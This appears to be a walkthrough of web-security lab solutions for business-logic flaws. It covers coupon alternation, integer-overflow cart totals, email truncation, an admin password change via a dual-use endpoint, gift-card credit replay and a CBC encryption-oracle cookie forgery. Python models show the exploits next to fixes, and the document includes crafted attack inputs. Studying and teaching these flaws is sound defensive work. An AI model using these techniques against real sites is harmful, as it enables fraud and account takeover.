Excessive trust in client-side controls

[screenshots]

High-level logic vulnerability

[screenshots]

Inconsistent security controls

[screenshots]

Flawed enforcement of business rules

[screenshots]

Try applying the same coupon a second time

[screenshots]

Now try the other coupon, SIGNUP30

[screenshot]

Alternating between the two coupons works: each coupon is accepted again as long as the other one was applied in between.

[screenshots]
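The behaviour above, as an added example that is not code from the page or the lab: a cart whose "already applied" check only remembers the most recently used coupon, beside the fixed check. SIGNUP30 is on the page; the second coupon's name (NEWCUST5), both discount rules (a flat $5 and 30 % off the running total) and the $1337.00 cart total are assumptions for illustration. Amounts are integer cents.

```python
# Added example (not code from the page or the lab): a cart whose coupon check
# only remembers the most recently applied coupon, next to the fixed check.
# SIGNUP30 is on the page; the second coupon's name (NEWCUST5), both discount
# rules (flat $5 / 30 % off the running total) and the $1337.00 cart total
# are assumptions for illustration. Amounts are integer cents.
from dataclasses import dataclass, field

COUPONS = {
    "NEWCUST5": lambda total_cents: 500,
    "SIGNUP30": lambda total_cents: total_cents * 30 // 100,
}


@dataclass
class Cart:
    total_cents: int
    applied: list = field(default_factory=list)

    def _discount(self, code):
        if code not in COUPONS:
            raise ValueError("unknown coupon")
        self.total_cents = max(self.total_cents - COUPONS[code](self.total_cents), 0)
        self.applied.append(code)

    def apply_coupon_vulnerable(self, code):
        # Bug: the check compares against the *last* coupon only, so
        # A, B, A, B, ... is accepted indefinitely.
        if self.applied and self.applied[-1] == code:
            raise ValueError("coupon already applied")
        self._discount(code)

    def apply_coupon_fixed(self, code):
        # Fix: a coupon is refused if it appears anywhere in the order's history.
        if code in self.applied:
            raise ValueError("coupon already applied")
        self._discount(code)


def alternate(cart, method_name, codes, rounds):
    """Apply `codes` in rotation until the cart refuses one.
    Returns (number of coupons accepted, final total in cents)."""
    apply = getattr(cart, method_name)
    accepted = 0
    for i in range(rounds):
        try:
            apply(codes[i % len(codes)])
        except ValueError:
            break
        accepted += 1
    return accepted, cart.total_cents


if __name__ == "__main__":
    codes = ["NEWCUST5", "SIGNUP30"]
    print(alternate(Cart(133700), "apply_coupon_vulnerable", codes, 20))
    print(alternate(Cart(133700), "apply_coupon_fixed", codes, 20))
```

With the vulnerable check twenty alternating coupons are all accepted and the $1337.00 total drops to $26.44; the fixed check accepts one of each and stops at $932.40. Note that the vulnerable version does refuse the same coupon twice in a row, which is exactly what makes a single-coupon test look safe.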

Low-level logic flaw

[screenshots]

You can see that once the quantity is high enough the total turns negative, which shows the total price has exceeded the largest value the back end's integer type can hold and wrapped around.

Empty the cart

[screenshot]

This time send exactly 324 requests

[screenshot]

Then bring the quantity to exactly 32123

[screenshots]

Then add low-priced items to push the total back up to a small positive amount

[screenshots]
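The arithmetic behind the steps above, as an added example that is not code from the page or the lab. It models the cart total as a signed 32-bit integer of cents (the page only shows the total going negative; the exact width is an assumption) and searches for the add-to-cart plan that wraps it to a small positive amount. The expensive item's price ($1337.00), the $100.00 store credit, the $10.00 filler item and the limit of 99 units per request are assumptions for illustration.

```python
# Added example, not code from the page or the lab. It models the cart total
# as a signed 32-bit integer of cents (the page only shows the total going
# negative; the exact width is an assumption) and works out the add-to-cart
# plan that wraps it to a small positive amount. The expensive item's price
# ($1337.00), the $100.00 store credit, the $10.00 filler item and the limit
# of 99 units per request are assumptions for illustration.
from dataclasses import dataclass

MASK32 = (1 << 32) - 1


def to_signed32(value: int) -> int:
    """Store an integer in a signed 32-bit accumulator and read it back."""
    value &= MASK32
    return value - (1 << 32) if value & 0x80000000 else value


def ceil_div(a: int, b: int) -> int:
    return -(-a // b)


@dataclass(frozen=True)
class Plan:
    item_qty: int      # units of the expensive item
    filler_qty: int    # units of the cheap item added afterwards
    total_cents: int   # wrapped total the checkout page will show
    requests: int      # add-to-cart requests needed


def plan_overflow(price_cents: int, credit_cents: int, filler_cents: int,
                  max_per_request: int = 99):
    """Return the plan with the fewest requests whose wrapped total satisfies
    0 < total <= credit. Only the first wrap of the accumulator is searched."""
    best = None
    for qty in range(1, (1 << 32) // price_cents + 2):
        wrapped = to_signed32(qty * price_cents)
        if wrapped > credit_cents:
            continue  # still positive and unaffordable, or overshot the wrap
        # a negative (or zero) total is pulled just above zero with cheap items
        filler = 0 if wrapped > 0 else ceil_div(1 - wrapped, filler_cents)
        total = to_signed32(wrapped + filler * filler_cents)
        if not 0 < total <= credit_cents:
            continue
        requests = ceil_div(qty, max_per_request) + ceil_div(filler, max_per_request)
        if best is None or requests < best.requests:
            best = Plan(qty, filler, total, requests)
    return best


def add_to_cart_requests(qty: int, max_per_request: int = 99) -> list:
    """Split a quantity into the per-request quantities the shop accepts."""
    full, rest = divmod(qty, max_per_request)
    return [max_per_request] * full + ([rest] if rest else [])


if __name__ == "__main__":
    plan = plan_overflow(133700, 10000, 1000)
    print(plan)
    print(len(add_to_cart_requests(plan.item_qty)), "requests for the expensive item")
```

Under these assumptions the plan is 32123 units of the expensive item (324 requests of 99 plus one of 47), which wraps the total to -$1,221.96, followed by 123 filler units that bring it to $8.04. One unit more (32124) would wrap to +$115.04, already above the store credit, which is why the page stops at 32123 and tops up with cheap items instead.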

Inconsistent handling of exceptional input

[screenshots]

Try registering with a very long email address

[screenshots]

After logging in we see that our email address was truncated

[screenshot]

The stored value is exactly 255 characters long

[screenshot]

So we can construct the address so that its first 255 characters end in @dontwannacry.com while the full address still points at our exploit server:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@dontwannacry.com.exploit-0a020023041f7954c47a7434018b00e8.exploit-server.net

[screenshots]
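The truncation trick above, as an added example that is not code from the page or the lab. It models a registration handler whose email column holds 255 characters (the page shows the stored address cut to exactly 255) and which validates the domain only on the truncated value, beside a handler that rejects over-long input instead. The exploit-server hostname is the one from the page; the trusted domain is dontwannacry.com.

```python
# Added example, not code from the page or the lab. It models a registration
# handler whose email column holds 255 characters (the page shows the stored
# address cut to exactly 255) and which validates the domain only on the
# truncated value, beside a handler that rejects over-long input instead. The
# exploit-server hostname is the one from the page; the trusted domain is
# dontwannacry.com.
LIMIT = 255
TRUSTED_DOMAIN = "dontwannacry.com"
EXPLOIT_HOST = "exploit-0a020023041f7954c47a7434018b00e8.exploit-server.net"


def delivery_domain(email: str) -> str:
    """The domain mail is actually sent to: everything after the last '@'."""
    return email.rsplit("@", 1)[-1]


def build_address(trusted_domain: str = TRUSTED_DOMAIN,
                  attacker_host: str = EXPLOIT_HOST,
                  limit: int = LIMIT, pad: str = "a") -> str:
    """Pad the local part so that the first `limit` characters end in
    '@trusted_domain' while the whole address is a subdomain of attacker_host."""
    suffix = "@" + trusted_domain
    return pad * (limit - len(suffix)) + suffix + "." + attacker_host


def register_vulnerable(email: str, limit: int = LIMIT):
    """Bug: truncate to the column width first, then trust what was stored."""
    stored = email[:limit]
    return stored, delivery_domain(stored) == TRUSTED_DOMAIN


def register_fixed(email: str, limit: int = LIMIT):
    """Reject input that would not fit, and check the domain of the address
    that will actually receive the confirmation mail."""
    if len(email) > limit:
        raise ValueError("email address too long")
    return email, delivery_domain(email) == TRUSTED_DOMAIN


if __name__ == "__main__":
    addr = build_address()
    print(len(addr), register_vulnerable(addr))
```

The confirmation mail goes to the full address, whose domain is `dontwannacry.com.<exploit host>`, so the exploit server receives it, while the account record keeps only the first 255 characters and therefore appears to belong to dontwannacry.com. The fixed handler refuses the address outright, so the two views of the same input can never disagree.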

Weak isolation on dual-use endpoint

[screenshots]

Request body with the username changed to administrator and no current-password parameter:

csrf=cEeDORihsFQAVYnvjXRcLdQbsuKh5f2k&username=administrator&new-password-1=1&new-password-2=1

[screenshots]

Insufficient workflow validation

[screenshot]

Buy a cheap item first to observe the checkout flow

[screenshots]

Replay this request directly

[screenshot]

Authentication bypass via flawed state machine

[screenshots]

We see there is a /role-selector request

[screenshot]

Try dropping this request

[screenshots]

Infinite money logic flaw

[screenshots]

Buy a gift card

[screenshots]

Redeem the gift card and notice that the store credit has gone up.

So we only need to replay these five requests in sequence, and each round adds three dollars

[screenshots]

Select these five

[screenshots]

until the last response is a 302

[screenshots]

Authentication bypass via encryption oracle

[screenshots]

A response comes back, but it is encrypted

[screenshots]

This time submit an invalid email; the response echoes our input

[screenshot]

A cookie is also set on submission, so we guess this cookie holds our email

[screenshot]

So we try to decrypt the stay-logged-in cookie

[screenshot]

csrf=OwsPvnxVGvbDlLQmwu9GkEWEz6f7SYI3&postId=8&comment=1&name=1&email=administrator:1672233054163&website=

Try encrypting the administrator value

[screenshots]

But the decrypted value carries extra characters (the error-message text) in front of our input, which we need to remove

[screenshot]

That is probably caused by those extra characters; let's try deleting a few bytes

[screenshots]

Here we see the ciphertext length must stay a multiple of 16, the block size, so we can only remove whole blocks: the extra characters first have to be padded out to a block boundary, then the leading blocks removed

xxxxxxxxxadministrator:1672233054163

(the nine x characters pad the leading text out to exactly 32 bytes, two full blocks)

[screenshot]

KpixgTZJ%2fosvapy2X2PJ0%2f0G%2fl1gUwHzlDhn20kM58EZ1o5UjocNHnclqBviBttbdymw%2f5K8pCQFKFq4NDkPAw%3d%3d

[screenshot]

This time delete 32 bytes

[screenshots]

Cookie:  stay-logged-in=%47%64%61%4f%56%49%36%48%44%52%35%33%4a%61%67%62%34%67%62%62%57%33%63%70%73%50%2b%53%76%4b%51%6b%42%53%68%61%75%44%51%35%44%77%4d%3d;

[screenshots]
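The whole encryption-oracle chain above, as an added example that is not code from the page or the lab. It is a local model of the two endpoints the page abuses: the comment form, which encrypts the error text plus our input into a notification cookie (an encryption oracle), and the stay-logged-in cookie, which the server decrypts and trusts as `username:timestamp` (a decryption oracle). Assumptions: both cookies use the same key in CBC mode with the IV prepended to the ciphertext, the error text is the 23-byte string `Invalid email address: ` (the page only shows that extra characters precede the input), and a toy invertible 16-byte permutation stands in for the real block cipher. The chop-the-leading-blocks trick depends only on the mode and the cookie layout, not on the cipher.

```python
# Added example, not code from the page or the lab. A local model of the two
# endpoints the page abuses: the comment form, which encrypts
# "Invalid email address: " + input into a notification cookie (an encryption
# oracle), and the stay-logged-in cookie, which the server decrypts and trusts
# as "username:timestamp" (a decryption oracle). Assumptions: both cookies use
# the same key in CBC mode with the IV prepended to the ciphertext, the error
# text is the 23-byte string below, and a toy invertible 16-byte permutation
# stands in for the real block cipher.
import base64
import os

BLOCK = 16
KEY = b"assumed-key-16by"              # 16 bytes, an assumption
PREFIX = "Invalid email address: "     # assumed error text (23 bytes)


def toy_encrypt_block(block: bytes) -> bytes:
    # Reverse the bytes and XOR with the key: invertible, NOT secure.
    return bytes(b ^ k for b, k in zip(block[::-1], KEY))


def toy_decrypt_block(block: bytes) -> bytes:
    return bytes(b ^ k for b, k in zip(block, KEY))[::-1]


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(plaintext: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    prev, out = iv, [iv]
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        c = toy_encrypt_block(bytes(p ^ v for p, v in zip(padded[i:i + BLOCK], prev)))
        out.append(c)
        prev = c
    return b"".join(out)


def cbc_decrypt(data: bytes) -> bytes:
    # Rejects anything that is not whole blocks, which is what the page runs
    # into when it deletes a few bytes at a time.
    if len(data) % BLOCK or len(data) < 2 * BLOCK:
        raise ValueError("ciphertext length must be a multiple of 16")
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        c = data[i:i + BLOCK]
        out.append(bytes(d ^ v for d, v in zip(toy_decrypt_block(c), prev)))
        prev = c
    return pkcs7_unpad(b"".join(out))


# --- the two endpoints as the page observes them ---
def notification_cookie(email: str) -> str:
    """Comment form with a bad email: sets an encrypted error-message cookie."""
    return base64.b64encode(cbc_encrypt((PREFIX + email).encode())).decode()


def stay_logged_in_user(cookie: str) -> str:
    """Server side of stay-logged-in: decrypt and trust the plaintext."""
    return cbc_decrypt(base64.b64decode(cookie)).decode()


# --- the attack ---
def prefix_length() -> int:
    """Step 1: push a probe through both oracles to measure the error text."""
    probe = "probe"
    return len(stay_logged_in_user(notification_cookie(probe))) - len(probe)


def forge_stay_logged_in(target: str) -> str:
    """Steps 2-3: pad the prefix to a block boundary, encrypt, then drop the
    leading blocks so that the last prefix block becomes the IV."""
    plen = prefix_length()
    pad = (-plen) % BLOCK                       # 9 'x' bytes for a 23-byte prefix
    blob = base64.b64decode(notification_cookie("x" * pad + target))
    return base64.b64encode(blob[plen + pad:]).decode()   # drop 32 bytes


if __name__ == "__main__":
    cookie = forge_stay_logged_in("administrator:1672233054163")
    print(stay_logged_in_user(cookie))
```

Dropping 32 bytes works because the cookie is IV | C1 | C2 | C3 | …: after removing the IV and C1, C2 is read as the IV and C3 decrypts to the first block of `administrator:…`. The server-side fix is to stop sharing one key and one plaintext format between a user-visible error cookie and a session credential, and to authenticate the cookie (an AEAD with the cookie's purpose in the associated data) so that a truncated ciphertext is rejected instead of decrypted.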